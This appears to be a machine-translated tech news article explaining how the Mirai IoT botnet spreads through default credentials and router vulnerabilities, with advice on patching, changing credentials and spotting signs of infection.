One of the malware that over the years has caused the most problems, even and especially on corporate devices, is Mirai. It is a harmful component that has often “shed its skin” over time to update its attack methods and become more and more effective. We talk about Mirai botnet because to spread, malware exploits vulnerabilities present in individual hardware devices and left unresolved (failure to apply security patches). However, Mirai also exploits insecure configurations and makes its way to le-protected devices password predefinite or easy-to-guess credentials.
What is the Mirai botnet and how it works
Once successfully attacked, devices attacked by Mirai are added to one botnet that is, a virtual network of devices under the direct control of the attackers. The Mirai bonet can then be used to throw DDoS attacks (Distributed Denial of Service) on a large scale and take websites and services of all kinds offline. THE infected devicessuch as security cameras, routers, network equipment, IoT devices, are “recruited” online and added to the botnet.
The creators of Mirai have developed a large list of common or default username and password combinations used on many devices. Furthermore, they continuously update the list of devices that can be attacked.
The botnet then runs a IP address scanning at scale to identify vulnerable devices and automatically try both an attack based on login credentials and an attack that attempts to exploit known vulnerabilities.
Mirai variant attacks many router models from various manufacturers
The researchers of Palo Alto Networks have detected the existence of a variant of Mirai capable of targeting devices from many manufacturers. Mention the branded ones D-Link, Arris, Zyxel, TP-Link, Tenda, Netgear e MediaTek.
The attackers targeted at least 22 vulnerabilities several, documented from Palo Alto, affecting routers and other hardware devices in order to maximize the diffusion of Mirai on a global scale. Among the products that complain i safety issues exploited by the Mirai botnet, there are routers, DVRs, NVRs, dongle WiFi, thermal monitoring systems, access control systems and photovoltaic panel monitoring mechanisms.
The attack begins by exploiting one of the vulnerabilities mentioned. This way Mirai can lay the groundwork for running one script at the level of shell. The malicious script, uploaded from a remote server, downloads Mirai code developed for the compromised device’s architecture. Currently, cybercriminals have developed platform-friendly versions of Mirai armv4l, arm5l, arm6l, arm7l, mips, mipsel, sh4, x86_64, i686, i586, arc, m68k e sparc.
To minimize the chances of recognition, Mirai provides encrypt her strings and takes advantage of some technical shrewdness to act quickly and stealthily.
How to reduce the risk of infection
It is possible to reduce the risk of infection applying the latest firmware update released by the manufacturer of your devices, replacing the default login credentials with a sufficiently robust username-password pair and disabling remote access. In another article we have seen how to improve the security of the router and WiFi and which interventions, on the other hand, are useless.
Among the signs of a possible Mirai botnet infection we mention for example excessive overheating, abnormal modification of settings and configurations, detection of frequent disconnections, general decrease in device performance.
The top image is from Palo Alto Networks, Unit 42.